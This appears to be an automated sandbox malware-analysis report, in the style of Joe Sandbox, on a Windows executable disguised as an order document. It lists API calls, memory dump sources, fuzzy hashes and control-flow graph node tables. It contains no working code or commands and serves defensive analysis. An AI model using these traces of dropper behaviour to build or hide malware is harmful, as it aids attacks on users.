                                                  • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 004060D2
                                                  • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0), ref: 004060E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp
                                                  • API String ID: 3248276644-2967713064
                                                  • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction ID: 57cdea5284265d05e194d97f438d60f20e9a33b3e1b8f85ab2b18f32e1c9dba5
                                                  • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                  • Instruction Fuzzy Hash: F6F04425184A6259E622B73A0C05AAF25098F82324B4B463FF803B22C1DF3D8963917E
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004056CA
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                    • Part of subcall function 0040466D: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040467F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction ID: a38bd53333deb2965cf6bcfe27cab5e967b0379a0e7dc5bd4266cb97908be95f
                                                  • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                  • Instruction Fuzzy Hash: A901B131200708EFDB204F90DEC0A9B3665FB84750F504036F605761D1D77A8C92AE2D
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067E1,80000002), ref: 004065B6
                                                  • RegCloseKey.ADVAPI32(?), ref: 004065C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                  • Instruction ID: 4169300ffd031f607b120f1368fde5344542a6b636238975c7224480bb0190f2
                                                  • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                  • Instruction Fuzzy Hash: 93017C72500209BBDF218F55DC09EDB3BA8EB54364F01803AFD1AA2190E778D964DBA4
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 00405FC3
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403161,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,80000000,00000003), ref: 00405FD3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3976562730
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: 38d9290afe44bb03d7cf08b54fe4d5b58535dca9612c3dc8604b8734ddeb262b
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 3AD05EB2411921DAD3126704DD01D9F77ACEF12300746482AE440A7161D7785C8186AC
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                  • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                  • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                  • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99

                                                  Execution Graph

                                                  Execution Coverage:7.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:81
                                                  Total number of Limit Nodes:9
                                                  execution_graph 37169 38203210 37170 38203256 GetCurrentProcess 37169->37170 37172 382032a1 37170->37172 37173 382032a8 GetCurrentThread 37170->37173 37172->37173 37174 382032e5 GetCurrentProcess 37173->37174 37175 382032de 37173->37175 37176 3820331b 37174->37176 37175->37174 37177 38203343 GetCurrentThreadId 37176->37177 37178 38203374 37177->37178 37157 385e21f8 37158 385e2220 37157->37158 37161 385e224c 37157->37161 37159 385e2229 37158->37159 37162 385e1764 37158->37162 37163 385e176f 37162->37163 37165 385e2543 37163->37165 37166 385e1780 37163->37166 37165->37161 37167 385e2578 OleInitialize 37166->37167 37168 385e25dc 37167->37168 37168->37165 37179 38203458 DuplicateHandle 37180 382034ee 37179->37180 37181 120848 37183 12084e 37181->37183 37182 12091b 37183->37182 37186 382020f8 37183->37186 37190 38202108 37183->37190 37187 38202117 37186->37187 37194 38201824 37187->37194 37191 38202117 37190->37191 37192 38201824 CreateWindowExW 37191->37192 37193 38202138 37192->37193 37193->37183 37195 3820182f 37194->37195 37198 38202f94 37195->37198 37197 38203abe 37197->37197 37199 38202f9f 37198->37199 37200 382041e4 37199->37200 37203 38205a66 37199->37203 37207 38205a68 37199->37207 37200->37197 37204 38205a89 37203->37204 37205 38205aad 37204->37205 37211 38205c18 37204->37211 37205->37200 37208 38205a89 37207->37208 37209 38205aad 37208->37209 37210 38205c18 CreateWindowExW 37208->37210 37209->37200 37210->37209 37212 38205c25 37211->37212 37213 38205c5e 37212->37213 37215 38203fa4 37212->37215 37213->37205 37216 38203faf 37215->37216 37218 382060d0 37216->37218 37219 38203fb4 37216->37219 37218->37218 37220 38203fbf 37219->37220 37226 38205c94 37220->37226 37222 3820613f 37230 3820b448 37222->37230 37235 3820b460 37222->37235 37223 38206179 37223->37218 37229 38205c9f 37226->37229 37227 382073c8 37227->37222 37228 38205a68 CreateWindowExW 37228->37227 37229->37227 37229->37228 37231 3820b460 37230->37231 37232 3820b49d 37231->37232 37241 3820c757 37231->37241 37245 3820c768 37231->37245 37232->37223 37237 3820b491 37235->37237 37238 3820b591 37235->37238 37236 3820b49d 37236->37223 37237->37236 37239 3820c757 CreateWindowExW 37237->37239 37240 3820c768 CreateWindowExW 37237->37240 37238->37223 37239->37238 37240->37238 37242 3820c768 37241->37242 37243 3820c842 37242->37243 37249 3820d791 37242->37249 37243->37243 37246 3820c793 37245->37246 37247 3820c842 37246->37247 37248 3820d791 CreateWindowExW 37246->37248 37248->37247 37250 3820d7dd CreateWindowExW 37249->37250 37251 3820d7a9 37249->37251 37253 3820d914 37250->37253 37251->37243 37253->37253 37254 385e0040 37255 385e0082 37254->37255 37257 385e0089 37254->37257 37256 385e00da CallWindowProcW 37255->37256 37255->37257 37256->37257

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 439 38213158-38213179 440 3821317b-3821317e 439->440 441 38213184-382131a3 440->441 442 3821391f-38213922 440->442 451 382131a5-382131a8 441->451 452 382131bc-382131c6 441->452 443 38213924-38213943 442->443 444 38213948-3821394a 442->444 443->444 445 38213951-38213954 444->445 446 3821394c 444->446 445->440 449 3821395a-38213963 445->449 446->445 451->452 454 382131aa-382131ba 451->454 457 382131cc-382131db 452->457 454->457 565 382131dd call 38213970 457->565 566 382131dd call 38213978 457->566 458 382131e2-382131e7 459 382131f4-382134d1 458->459 460 382131e9-382131ef 458->460 481 38213911-3821391e 459->481 482 382134d7-38213586 459->482 460->449 491 38213588-382135ad 482->491 492 382135af 482->492 494 382135b8-382135cb 491->494 492->494 496 382135d1-382135f3 494->496 497 382138f8-38213904 494->497 496->497 500 382135f9-38213603 496->500 497->482 498 3821390a 497->498 498->481 500->497 501 38213609-38213614 500->501 501->497 502 3821361a-382136f0 501->502 514 382136f2-382136f4 502->514 515 382136fe-3821372e 502->515 514->515 519 38213730-38213732 515->519 520 3821373c-38213748 515->520 519->520 521 382137a8-382137ac 520->521 522 3821374a-3821374e 520->522 523 382137b2-382137ee 521->523 524 382138e9-382138f2 521->524 522->521 525 38213750-3821377a 522->525 536 382137f0-382137f2 523->536 537 382137fc-3821380a 523->537 524->497 524->502 532 38213788-382137a5 525->532 533 3821377c-3821377e 525->533 532->521 533->532 536->537 539 38213821-3821382c 537->539 540 3821380c-38213817 537->540 544 38213844-38213855 539->544 545 3821382e-38213834 539->545 540->539 543 38213819 540->543 543->539 549 38213857-3821385d 544->549 550 3821386d-38213879 544->550 546 38213836 545->546 547 38213838-3821383a 545->547 546->544 547->544 551 38213861-38213863 549->551 552 3821385f 549->552 554 38213891-382138e2 550->554 555 3821387b-38213881 550->555 551->550 552->550 554->524 556 38213883 555->556 557 38213885-38213887 555->557 556->554 557->554 565->458 566->458
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$6(7
                                                  • API String ID: 0-3006832926
                                                  • Opcode ID: dbe6bbdefab10947a497049f03be6122198059901f30114cad03e5a80fc7e789
                                                  • Instruction ID: 742d6a58a86fa84d733604f91d1b0f8b5c70ee4ba1d53a60ca21781bfb0327bc
                                                  • Opcode Fuzzy Hash: dbe6bbdefab10947a497049f03be6122198059901f30114cad03e5a80fc7e789
                                                  • Instruction Fuzzy Hash: 50320C35E107198FDB14EF79D854A9DF7B2BFC9300F6186A9D409A7254EF30AA85CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4(7$4(7
                                                  • API String ID: 0-2754362049
                                                  • Opcode ID: 114cd5ade03c97d8f2731217a147f7e359ab9b4f8ca2ac390003a5279f926c2f
                                                  • Instruction ID: c3bb25332d4ed398a977cfda326dfeb5a03eb9b046e33dc9103eb2ad713e2e4f
                                                  • Opcode Fuzzy Hash: 114cd5ade03c97d8f2731217a147f7e359ab9b4f8ca2ac390003a5279f926c2f
                                                  • Instruction Fuzzy Hash: D1920738A00209CFDB14DF68C598B5DBBF2EB49314F6584A9E409AB351DB35ED86CF81
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d9dd1e405889c4dab97738c05280392822b98bde6b375c04fa4df79a2901c32
                                                  • Instruction ID: 69fd867dda7c01d2f0df8c8846929d8687e0044209c5d8ad980b67a8a68d7f12
                                                  • Opcode Fuzzy Hash: 0d9dd1e405889c4dab97738c05280392822b98bde6b375c04fa4df79a2901c32
                                                  • Instruction Fuzzy Hash: 17631931D10B1A8ADB11EF68C8806A9F7B1FF99300F55D79AE45877121EB70AAD4CF81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xq$$q
                                                  • API String ID: 0-855381642
                                                  • Opcode ID: 9f979000db15af387087107e9e8f2b8dabf0944b2c54acad19342ec86b778f91
                                                  • Instruction ID: cad8f5cd4e23ba19a8accee5a308f0808e034ffc4a58bdf89b142c46f50f59ba
                                                  • Opcode Fuzzy Hash: 9f979000db15af387087107e9e8f2b8dabf0944b2c54acad19342ec86b778f91
                                                  • Instruction Fuzzy Hash: C6B1C330B042289FDB1CAB79985527E7BA7BFC9300B19852EE447E7395DF389C029791
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: bb5f3fa5c6098dec0f69e821c9e6a53596935db0e7c65e91fa09c9f5bd7b0751
                                                  • Instruction ID: 95db45176970941a2d03a76d1af916bec4415ec366f3b1d438b457300dc4ee3c
                                                  • Opcode Fuzzy Hash: bb5f3fa5c6098dec0f69e821c9e6a53596935db0e7c65e91fa09c9f5bd7b0751
                                                  • Instruction Fuzzy Hash: 8AB13D70E003198FDF24CFA9E8957ADBBF2AF88314F148529D815E7294EB749865CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: 71e4e8827f3aaab527a6a129e0e26bfd62c0e8797456184d2cdf42ad53bbc05a
                                                  • Instruction ID: d330d84b76f09412d5c5cd29deb79341e24d07527d2d7c046a8a31b3cedd588c
                                                  • Opcode Fuzzy Hash: 71e4e8827f3aaab527a6a129e0e26bfd62c0e8797456184d2cdf42ad53bbc05a
                                                  • Instruction Fuzzy Hash: E0918F70E00319CFDF24CFA8E9857EDBBF2AF48314F148529E415A7294EB7499A5CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52710dab20b8e3f950633bff84005498d99068ddbb7a432860289845009df137
                                                  • Instruction ID: 2f0b6bad8425f5cdb284bd2e791a2ccc0e0bb44ac9ef458262d7c2fbca976b43
                                                  • Opcode Fuzzy Hash: 52710dab20b8e3f950633bff84005498d99068ddbb7a432860289845009df137
                                                  • Instruction Fuzzy Hash: DE324D38B102099FEB15DB68D891B9DBBF2FB89350F208529E405EB355DB35EC42CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd7dc74a9e7471a100a204e91b074d5da1339cd65f85133fa79fcd1d38ea2f78
                                                  • Instruction ID: ef7cb91eaaf70ead551d42a815362eabacc193d006db9076340d88a629fded81
                                                  • Opcode Fuzzy Hash: cd7dc74a9e7471a100a204e91b074d5da1339cd65f85133fa79fcd1d38ea2f78
                                                  • Instruction Fuzzy Hash: 7112BF35F002059FEB14DB68C98479EBBF2EF85350F2584AAE8599B385DB34DC42CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a911fac09e48d2881af1ebb2694b3d6b2d23872fd571ac29588835cec20044c7
                                                  • Instruction ID: 81f8c7825db2435198db17ff180ebbb2b6ed7319f3cac56fd689ae77ba302445
                                                  • Opcode Fuzzy Hash: a911fac09e48d2881af1ebb2694b3d6b2d23872fd571ac29588835cec20044c7
                                                  • Instruction Fuzzy Hash: C6223078E0020A9FEB14DB69D49079DBBF2EB49350F70852AF415EB391DB34DD828B91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HR(7$HR(7$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-173282569
                                                  • Opcode ID: 8bdbe22125137a4f8f1597391f33824dac70cc70e7221804276c3707dc88bcb6
                                                  • Instruction ID: 50f23769b9a36d59aa88fdc00908f40a95675ff4d358ec9883e3bfed9ae850c5
                                                  • Opcode Fuzzy Hash: 8bdbe22125137a4f8f1597391f33824dac70cc70e7221804276c3707dc88bcb6
                                                  • Instruction Fuzzy Hash: 04025A74A0020ADFEB14DF68D48079DB7F2FB85354F20892AE415EB291DB35ED86CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 567 38203202-3820329f GetCurrentProcess 572 382032a1-382032a7 567->572 573 382032a8-382032dc GetCurrentThread 567->573 572->573 574 382032e5-38203319 GetCurrentProcess 573->574 575 382032de-382032e4 573->575 576 38203322-3820333d call 382033e0 574->576 577 3820331b-38203321 574->577 575->574 581 38203343-38203372 GetCurrentThreadId 576->581 577->576 582 38203374-3820337a 581->582 583 3820337b-382033dd 581->583 582->583
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3820328E
                                                  • GetCurrentThread.KERNEL32 ref: 382032CB
                                                  • GetCurrentProcess.KERNEL32 ref: 38203308
                                                  • GetCurrentThreadId.KERNEL32 ref: 38203361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: K:}b
                                                  • API String ID: 2063062207-2105567145
                                                  • Opcode ID: f4923e9930dd3186208f26e2813a1f055a66bba8540778c90831058b57ddf139
                                                  • Instruction ID: aece240f0a6a8a72ce9448111ff0b04239c19206c25e387d36779e4996a058c2
                                                  • Opcode Fuzzy Hash: f4923e9930dd3186208f26e2813a1f055a66bba8540778c90831058b57ddf139
                                                  • Instruction Fuzzy Hash: 1B5145B09003498FDB14DFAAC549B9EBFF1BF88310F20845EE059A7261DB755941CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 590 38203210-3820329f GetCurrentProcess 594 382032a1-382032a7 590->594 595 382032a8-382032dc GetCurrentThread 590->595 594->595 596 382032e5-38203319 GetCurrentProcess 595->596 597 382032de-382032e4 595->597 598 38203322-3820333d call 382033e0 596->598 599 3820331b-38203321 596->599 597->596 603 38203343-38203372 GetCurrentThreadId 598->603 599->598 604 38203374-3820337a 603->604 605 3820337b-382033dd 603->605 604->605
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 3820328E
                                                  • GetCurrentThread.KERNEL32 ref: 382032CB
                                                  • GetCurrentProcess.KERNEL32 ref: 38203308
                                                  • GetCurrentThreadId.KERNEL32 ref: 38203361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: K:}b
                                                  • API String ID: 2063062207-2105567145
                                                  • Opcode ID: 03fe68695c96450a18045f1a579b50f0d074995996b88c2ecd3f96ac62d92420
                                                  • Instruction ID: 8db76f4f1e14f2df2118b0ff3a5355e8597b8534fb9894cd294f65462318c714
                                                  • Opcode Fuzzy Hash: 03fe68695c96450a18045f1a579b50f0d074995996b88c2ecd3f96ac62d92420
